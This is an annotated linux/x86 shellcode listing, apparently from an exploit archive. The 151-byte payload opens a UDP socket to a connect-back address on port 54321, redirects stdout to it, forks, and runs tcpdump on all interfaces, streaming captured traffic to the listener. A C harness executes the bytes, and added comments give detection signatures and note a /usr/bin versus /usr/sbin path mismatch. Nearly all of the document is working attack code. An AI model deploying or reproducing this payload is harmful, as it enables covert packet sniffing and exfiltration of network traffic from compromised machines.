linux/x86 connect-back port UDP/54321 live packet capture 151 bytes
来源:http://xenomuta.tuxfamily.org 作者:xenomuta 发布时间:2008-11-24  
/*
linux/x86 connect-back port UDP/54321 & dup2 &
fork() & execve() /usr/bin/tcpdump -iany -w- "port ! 54321"
151 bytes
by XenoMuta
     _  __                 __  ___      __      
    | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
    |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
   /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
  /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/ 

   xenomuta [ arroba ] phreaker [ punto ] net

  http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
 
- God bless you all -

*/
/*
 * sc: linux/x86 (32-bit, int $0x80 ABI) byte sequence, annotated one
 * instruction per line. As the annotations show, it opens a UDP socket,
 * connect()s it to 127.1.1.1:54321, dup2()s the socket onto fd 1 (stdout),
 * fork()s, lets the parent exit, and has the child execve() tcpdump with
 * -iany -w- "port ! 54321", so the capture stream is written to the socket.
 *
 * Observable behaviour for detection, derived from the bytes below:
 *   - outbound UDP datagrams to port 54321 carrying tcpdump's -w output;
 *   - a tcpdump process whose stdout is a UDP socket, started with "-w-"
 *     and a filter that excludes port 54321;
 *   - the process that ran these bytes exits right after fork().
 *
 * NOTE(review): the path bytes spell "/usr/sbin/tcpdump", while the file
 * header names /usr/bin/tcpdump.
 * NOTE(review): tcpdump needs packet-capture privileges; presumably the
 * hosting process must already hold them. Nothing in this listing grants them.
 */
unsigned char sc[] =
// <_start>:
"\x6a\x66" // push   $0x66 ; socketcall() syscall number
"\x58" // pop    %eax  ; to set up the socket
"\x6a\x01" // push   $0x1  ; socketcall sub-call 1 = socket()
"\x5b" // pop    %ebx
"\x31\xc9" // xor    %ecx,%ecx
"\x51" // push   %ecx  ; protocol = 0
"\x6a\x02" // push   $0x2  ; SOCK_DGRAM (udp)
"\x6a\x02" // push   $0x2  ; AF_INET
"\x89\xe1" // mov    %esp,%ecx ; ecx -> socket() argument array
"\xcd\x80" // int    $0x80
// IP: 127.1.1.1
"\x68\x7f\x01\x01\x01" // push   $0x101017f
// Port: 54321
"\x66\x68\xd4\x31" // pushw  $0x31d4 ; bytes d4 31 = 54321 in network byte order
"\x66\x31\xc9" // xor    %cx,%cx
"\x80\xc1\x02" // add    $0x2,%cl ; cx = 2 (AF_INET), built without a zero byte
"\x66\x51" // push   %cx   ; address family field of the sockaddr
"\x89\xe1" // mov    %esp,%ecx ; ecx -> sockaddr
"\x6a\x10" // push   $0x10 ; address length = 16
"\x51" // push   %ecx  ; pointer to sockaddr
"\x50" // push   %eax  ; socket fd returned by socket()
"\x89\xe1" // mov    %esp,%ecx ; ecx -> connect() argument array
"\x89\xc6" // mov    %eax,%esi ; keep the socket fd in esi
"\xb0\x66" // mov    $0x66,%al  ; socketcall ()
"\x80\xc3\x02" // add    $0x2,%bl   ; sub-call 3, for connect()
"\xcd\x80" // int    $0x80
"\x87\xde" // xchg   %ebx,%esi ; ebx = socket fd
"\x6a\x01" // push   $0x1
"\x59" // pop    %ecx      ; ecx = 1 (stdout)
"\x6a\x3f" // push   $0x3f      ; dup2(socket, stdout)
"\x58" // pop    %eax
"\xcd\x80" // int    $0x80
"\x31\xd2" // xor    %edx,%edx ; edx = 0, reused below as NULL / string terminator
"\x6a\x02" // push   $0x2       ; fork()
"\x58" // pop    %eax
"\xcd\x80" // int    $0x80
"\x39\xd0" // cmp    %edx,%eax  ; fork() returned 0: the child carries on
"\x74\x05" // je     0x4d <_child>
"\x6a\x01" // push   $0x1       ; parent: exit()
"\x58" // pop    %eax
"\xcd\x80" // int    $0x80
//<_child>:
"\x6a\x0b" // push   $0xb    ; execve() tcpdump -iany -w- "port ! 54321"
"\x58" // pop    %eax    ; captures everything except its own traffic
"\x52" // push   %edx    ; string terminator
"\x68\x34\x33\x32\x31" // push   $0x31323334 ; "port ! 54321"
"\x68\x20\x21\x20\x35" // push   $0x35202120
"\x68\x70\x6f\x72\x74" // push   $0x74726f70
"\x89\xe7" // mov    %esp,%edi ; edi -> "port ! 54321"
"\x52" // push   %edx    ; string terminator
"\x6a\x2d" // push   $0x2d               ; -w- ( write to stdout )
"\x66\x68\x2d\x77" // pushw  $0x772d
"\x89\xe6" // mov    %esp,%esi ; esi -> "-w-"
"\x52" // push   %edx    ; string terminator
"\x6a\x79" // push   $0x79               ; -iany ( all interfaces )
"\x68\x2d\x69\x61\x6e" // push   $0x6e61692d
"\x89\xe1" // mov    %esp,%ecx ; ecx -> "-iany"
"\x52" // push   %edx    ; string terminator
"\x6a\x70" // push   $0x70
"\x68\x70\x64\x75\x6d" // push   $0x6d756470 ; bytes spell /usr/sbin/tcpdump
"\x68\x6e\x2f\x74\x63" // push   $0x63742f6e
"\x68\x2f\x73\x62\x69" // push   $0x6962732f
"\x68\x2f\x75\x73\x72" // push   $0x7273752f
"\x89\xe3" // mov    %esp,%ebx ; ebx -> program path
"\x52" // push   %edx    ; argv terminator (NULL)
"\x57" // push   %edi    ; argv[3] = "port ! 54321"
"\x56" // push   %esi    ; argv[2] = "-w-"
"\x51" // push   %ecx    ; argv[1] = "-iany"
"\x53" // push   %ebx    ; argv[0] = program path
"\x89\xe1" // mov    %esp,%ecx ; ecx -> argv; edx (envp) is still 0
"\xcd\x80"; // int    $0x80


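/*
 * Test harness: casts the sc byte array to a function pointer and calls it.
 * sc is an ordinary writable data array, so where data pages are mapped
 * non-executable the call faults instead of running the bytes.
 *
 * Declared as int main(void) with an explicit return, because implicit int
 * and the empty parameter list are not valid in C99 and later.
 */
int main(void)
{
    void (*entry)(void) = (void (*)(void)) sc;

    entry();
    return 0;
}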

 